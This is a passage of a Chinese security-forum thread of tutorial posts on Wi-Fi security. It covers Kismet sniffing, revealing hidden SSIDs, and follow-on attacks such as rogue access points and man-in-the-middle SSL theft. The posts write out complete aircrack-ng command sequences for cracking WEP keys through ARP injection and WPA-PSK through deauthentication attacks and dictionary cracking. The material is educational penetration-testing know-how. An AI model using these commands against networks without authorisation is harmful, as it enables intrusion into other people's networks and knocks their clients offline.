发新帖我要提问
12
返回列表
打印
[其他]

无线安全入门、芯片选型、扫描器使用

[复制链接]
楼主: decoding
手机看帖
扫描二维码
随时随地手机跟帖
21
decoding|  楼主 | 2019-9-7 17:23 | 只看该作者 |只看大图 回帖奖励 |倒序浏览
使用Kismet来进行无线嗅探

Kismet不仅是一个扫描工具,Kismet其实是一个802.11协议数据包捕获、分析的框架(Kismet捕获到的数据包可以转储下来,给其他的分析框架使用)。它由3个部分组成:

1. kismet_server
2. kismet_client
3. kismet(ELF): 一个可执行文件,它kismet进行典型配置

使用特权

评论回复
22
decoding|  楼主 | 2019-9-7 17:24 | 只看该作者
在BT5下输入Kismet,Kismet会自动检测合适的源网卡

使用特权

评论回复
23
decoding|  楼主 | 2019-9-7 17:24 | 只看该作者
点击菜单栏的"S"可以对AP进行排序,点击特定的SSID,可以查看详细信息:

使用特权

评论回复
24
decoding|  楼主 | 2019-9-7 17:24 | 只看该作者
0x2: 数据包注入

Google上有很多"WEP密码**"、"WPA"、"WP2密码**"、也有很多自动化工具(如wifite、fern-wifi-cracker),它们**的原理就是数据包注入

使用Airodump-ng系列软件来进行无线数据包注入、密码**

1. WEP
通过静默捕获IVS数据包,或主动注入ARP数据包(这是一种数据帧),加快当前信道中的流量来加速**,最终的目的是捕获足够多的IVS数据包,从而利用RC4算法的缺陷来逆向出key
example:
ifconfig wlan1 up
airmon-ng start wlan1
airodump-ng mon0
airodump-ng --ivs -w longas -c 6 mon0
//这个时候理论上可以等待抓包抓到足够数量就可以了,但是为了加快抓包速度,可以采用arp注入的方式来加快抓包
//重新打开一个新的console,然后执行arp注入命令
aireplay-ng -3 -b 08:10:77:CF:C9:62 -h CC:AF:78:26:77:BD mon0
//抓包结束后,确保抓到了足够熟练的IVs包,开始**
aircrack-ng longas-01.ivs
如果抓到的IVs包数量不够,会遇到**失败,最好能抓到2W以上的包数量

2. WPA
通过主动注入Deanthentication/Disassociation数据包(它们属于管理帧,试图告诉AP某个客户端想断开连接,显然这并不是这个客户端的本意),来强制断开目标客户端和AP的Wi-Fi,连接,当目标试图和AP进行重连接的时候,黑客捕获握手4次包(Handshak Package),然后利用离线字典、或者彩虹表进行暴力**
example:
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0
//开始捕获无线数据包
airodump-ng --ivs -w longas -c 6 mon0
//另开一个console,进行Deauth攻击,为了捕获握手包
aireplay-ng -0 1 -a 08:10:77:CF:C9:62 -c CC:AF:78:26:77:BD mon0
//在右上角看到了 WPA handshake提示后,表示抓到了握手包,开始**WPA-PSK
aircrack-ng -w /pentest/passwords/wordlists/test.lst longas-01.ivs

使用特权

评论回复
25
decoding|  楼主 | 2019-9-7 17:25 | 只看该作者
要注意的一点是,WEP中注入的是数据帧,而WPA**中注入的是管理帧,关于IEEE802.11帧的格式,我在另一篇**中总结了一下

https://bbs.21ic.com/icview-2860312-1-1.html

使用特权

评论回复
26
decoding|  楼主 | 2019-9-7 17:26 | 只看该作者
0x3: 服务发现、主动发送探测数据包

为了在一定程度上对抗无线嗅探攻击,很多的无线网络AP采取了一些配置:

1. 开启隐藏模式(Hidden Mode)、或非广播模式(nonbroadcasting Mode)。这些网络在其"信标帧"数据包(一种管理帧)中并不包括SSID值(网络名称),它们也不回复广播类的探测请求
2. MAC地址过滤,只接收指定执行范围内的MAC地址的广播探测请求
这样造成的直接结果就是我们在"宽带连接列表"中看不到对应的SSID(WiFi名称)

针对这种防御手段,扫描器也采取了相应的技术来获得隐藏的SSID

1. 通过学习802.11的帧结构,我们知道802.11的管理帧是不需要授权的,所以,我们要做的就是把AP、或者给目标用户发送一个"解除关联数据帧(Disassociation Frame)",这样,目标用户就会和AP尝试进行"重新关联",这个管理帧会包含SSID。
这同时也是WPA**的基本条件,这本质上属于协议上的漏洞,IEEE协会似乎已经开始着手修补,但我目前还没有看到有新版本的协议格式发布
2. 除了在Beacon管理帧有有SSID,在普通的数据帧、控制数据发送的控制帧中同样会包含SSID(明文),可以通过捕获这类数据帧来获取SSID,并加入UI的显示列表

使用特权

评论回复
27
decoding|  楼主 | 2019-9-7 17:26 | 只看该作者
3. 后记

无线的安全研究有蛮多方向的,Google上比较多的**是密码**、工具使用方向的,讲的都很精彩,除此之外,个人觉得还可以和传统的内网安全问题结合起来,比如说:

1. 伪AP,流量劫持: 能达到和ARP投毒相似的效果
2. MIT中间人攻击
3. 基于中间人攻击的SSL明文窃取
http://www.freebuf.com/articles/web/5636.html
http://www.freebuf.com/tools/10530.html
http://www.freebuf.com/articles/web/5929.html
http://www.freebuf.com/articles/network/29288.html

使用特权

评论回复
发新帖 我要提问
您需要登录后才可以回帖 登录 | 注册

本版积分规则